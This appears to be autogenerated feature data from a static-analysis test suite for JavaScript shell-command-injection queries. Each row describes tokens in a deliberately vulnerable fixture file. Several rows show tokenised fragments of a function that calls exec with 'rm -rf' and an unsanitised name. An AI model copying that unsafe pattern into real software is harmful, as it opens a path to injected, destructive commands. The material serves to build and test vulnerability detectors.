Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:12:185:26 | require("path") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:12:185:26 | require("path") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:20:185:25 | "path" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:20:185:25 | "path" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:20:185:25 | "path" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:20:185:25 | "path" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:20:185:25 | "path" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:185:20:185:25 | "path" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:1:186:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:1:186:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:1:186:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:1:186:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:1:186:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:1:186:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:1:186:20 | module.exports.guard | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:1:186:20 | module.exports.guard | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:1:186:20 | module.exports.guard | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:1:194:1 | module. ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:1:194:1 | module. ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:1:194:1 | module. ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:8:186:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:8:186:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:8:186:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:16:186:20 | guard | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:16:186:20 | guard | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:16:186:20 | guard | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | cp | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | cp | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | path | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | path | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | path | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | path | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | this | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | this | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:186:23 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | 'arguments' object of anonymous function | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | exceptional return of anonymous function | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | functio ... // OK\\n} | assignedToPropName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | functio ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | functio ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | return of anonymous function | enclosingFunctionName | guard | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:24:194:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:34:186:37 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:34:186:37 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:34:186:37 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:34:186:37 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:186:34:186:37 | name | enclosingFunctionBody | name cp exec rm -rf name path exist name cp exec rm -rf name cp exec rm -rf name | +| 